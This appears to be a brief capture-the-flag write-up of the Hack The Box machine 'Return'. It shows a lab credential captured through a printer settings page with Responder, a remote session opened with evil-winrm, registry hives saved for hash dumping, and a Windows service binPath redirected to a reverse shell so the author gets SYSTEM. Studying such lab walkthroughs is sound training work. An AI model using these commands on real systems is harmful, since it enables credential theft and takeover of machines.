Return

Personal Rating: Easy

Insecure Printer Auth

There was a webserver at port 80 with a printer settings page

So I got a server address. But I could not set the password for the account here. Running responder and giving my own address as server address gave me the password of the svc-printer user though: return\svc-printer:1edFg43012!!

I wanted to use evil-winrm, but I had to set some SSL settings temporarily as the box uses legacy algorithms:

[provider_sect]
default = default_sect
legacy = legacy_sect

[default_sect]
activate = 1

[legacy_sect]
activate = 1

I could get a Powershell session with:

evil-winrm -u svc-printer -p ‘1edFg43012!!’ -i 10.10.11.108

Windows Hashdumping

From there I could gather the system hashes

reg save HKLM\SAM .\sam
reg save HKLM\SAM .\system
reg save HKLM\SAM .\security

Then I could dump them with samdump2 -o outfile system sam

However, the Administrator hash was the null hash and I could not log in with it

Service Hijack

With net user svc-printer I could find out that the user was part of the Server Operator group. With services I also listed the running services. Abusing the rights I have with that group, I could set the path for a service that runs as system to any folder and place a reverse shell there.

sc.exe config VMTools binPath= "C:/Users/svc-printer/reverseshell.exe"

After restarting the service I got a reverse shell as Administrator.

PreviousRedPanda NextSau

Last updated 1 year ago